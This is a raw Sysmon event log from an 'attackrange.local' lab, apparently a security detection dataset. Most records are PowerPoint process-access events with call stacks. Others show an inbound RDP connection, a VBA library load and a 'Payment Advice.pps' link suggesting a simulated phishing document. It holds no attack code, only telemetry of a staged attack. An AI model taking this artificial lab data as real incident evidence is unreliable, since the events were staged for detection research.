Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4BA70CD8AEB0606FB75EE4F77C5E61C,SHA256=2A15D616F13E2B37FD28234A11B70C82A6639B52D8F2E4AFA1E5F80E62F8F3FC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050760Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:14.420{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61276-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050759Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:16.334{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB6BBF75C7BE1069B6448793D0A7180B,SHA256=3F25D23D9FF492B362A287D67A2028FDA30D29D20AEE674FF14973E0D1FBE5E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54961532C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54961532C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54961532C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54961532C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54961532C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54961532C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54961532C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54961532C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000081836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\Payment Advice.pps.LNK2021-04-20 14:59:17.965 23542300x800000000000000081835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\Payment Advice.pps.LNKMD5=5276F6A5CE743C585E31667AEFA9FCAF,SHA256=80354CEB2FCE201574F4C767A4E792FD5B6A8CC77D842CBDA61193A091F07EE8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54961532C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54961532C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54961532C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54961532C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54961532C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000081829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.950{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL7.01.1091Visual Basic Environment International ResourcesVisual Basic EnvironmentMicrosoft Corporation-MD5=CDA3EA478C604783B76964E88FD7030D,SHA256=DEBCD9E5DA29B2675C95055DBC342B74369BB5ED34ED5BAFC0738F470D5B4E69,IMPHASH=00000000000000000000000000000000trueMicrosoft CorporationValid 10341000x800000000000000081828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54961532C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54961532C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:17.965{A7A01FEF-EC20-607E-9B0E-00000000BB01}54961532C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft 